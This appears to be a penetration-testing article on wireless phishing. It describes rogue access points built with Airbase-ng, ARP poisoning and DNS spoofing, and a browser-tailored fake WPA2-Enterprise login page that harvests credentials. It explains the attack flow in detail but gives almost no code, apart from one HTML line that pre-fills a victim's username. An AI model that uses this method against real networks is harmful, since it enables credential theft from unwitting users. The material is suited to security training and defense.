Wireless phishing

  Wi-Fi Threats   -  

Introduction

Social engineering attacks have become more popular among professional penetration testers, and also have become more technical. Long ago, a pen-tester could simply call a few of its company’s employees under false pretenses and retrieve passwords, login info, and more. With security awareness from a few of today’s leading computer security experts, these attacks have become much harder to pull off. Methods for Social Engineering have evolved over the years accordingly. New attacks have been designed to create real false pretenses like phishing, for example, in which an attacker designs a webserver to pretend to be another webserver. ARP poisoning, and DNS spoofing attacks take this attack to a more advanced level at which the victim’s browser states that he or she is, in fact, at the actual site which requires a secure login.

Rogue AP’s are the biggest threat to Wireless Security today. This is due to the 802.11 protocol being a shared medium. The RF waves released from an antenna propagate in all directions, even if focused using a semi directional or directional antenna. These attacks are, in fact, a type of social engineering attack. New tools have been developed for attackers to pretend to be AP’s like Airbase-ng in the Aircrack-ng Suite. This tool allows an attacker to create a pseudo radio in Master mode and send beacons, allow incoming connections, and with a little help from iptables route packets, just as if the radio where an actual AP. In fact, with a little bit of strong networking knowledge, an attacker can bridge the connection of his Rogue AP radio to a second radio, which has an internet connection another wireless router. To get a victim to connect to an attackers fake AP is rather simple, as the victims radio will send to the AP with the highest TX/RX power. This means that on site attacks are required, and the higher EIRP of the attackers’ radio, the better.

WPA

WPA, or WPA Phishing Attack, uses all of the above concepts to attack WPA2 Enterprise networks, with a bit of its own style. In this attack, Airbase-ng is used to create a rogue wireless access point in the vicinity of the environment in which the pen-tester has been hired to assess. The attacker’s machine also hosts a DHCP server to serve IP addresses, and an HTTP/PHP server to host the actual phisher.

The attack then uses simple tools to ARP poison and DNS spoof the victim, redirecting all HTTP through the local webserver which hosts the actual phisher until credentials are detected in log file.

THE PHISHER

The phisher is coded to perform OS/Browser detection and then serve a webpage according to the results. This simple web page is a false error web page in which a false WPA/WPA2 authentication window is embedded.

The OS detection is necessary to make the victim believe that he or she needs to re-authenticate with the Wirelsss AP. The browser detection is necessary as the text fields all vary in height. If, however, a username were retrieved from an attacker in either an offline social engineer attack, or from a wireless sniffing device, it can then be placed into the username field to give the victim a better sense of realness in observing the false login/re-authentication window like so:

<input type=”text” value=”victim name” />

The OS/Browser detection changes the padding width from the top of the check box to the three fields in the form. It also changes the embedded background images, the image of the WPA2/enterprise login window, and the OK button accordingly. An example would be for Windows XP (NT 5.1) Using MSIE requires a longer center text box width than that of using Windows XP (NT 5.1) With Chrome or Firefox. Many small differences like this across different OS’s and browser has made the task of arrangement quite tedious!

Below is an image of how the user agent appears to the webserver from a Microsoft Windows XP / IE Bowser machine.

1

Figure 1 – Normal MITM attack operation

The above image displays normal MITM attack using Airbase-ng. The attacker’s [red] traffic is from the radio in Master Mode. The [Green] traffic is from a separate radio in Managed Mode, associated and authenticated with a valid session to the AP. Traffic from the victim can traverse to the attacker, to the AP, back to the attacker, and then finally back to the victim. One can imagine the devastating effects from this simple attack.

In the WPA Phishing Attack, the traffic is stopped by the attacker which displays a fake WPA/WPA2 login page for the corresponding OS data gathered from the PHP server using regular expressions.

Once the wpa-credcheck.php script detects a login attempt the attacker is notified via his or her web browser. The attack happens a second time to simulate bad credentials. This creates the illusion that a typo has occurred or for those who put in false credentials to a network they don’t know. After the second set of credentials is detected, the attacker stops the ARP poisoning and DNS spoofing allowing traffic to pass through as a normal MITM operation would take place. The URL in the browser that the victim was trying to access is now passed right to the browser via PHP. This creates a seamless false login experience for the victim, and gives the pen-tester a better payload; the WPA2-Enterprise username and password.

 2

Figure 2 – The Flow

The above image illustrates the flow of WPA Phishing Attack in a sequential manner. During “A” the user is browsing the web fine. Once the computer attaches to the rogue access point, “B” occurs, forcing the user to enter login credentials to continue. Finally after entering credentials in “C” the victim then flows directly to the second radio and out to the AP. This is an interrupt attack. This attack interrupts the normal network operation of the victim user.

The Line-Out attack is much simpler, as it occurs when a victim user opens his or her laptop and connects directly to the attacker.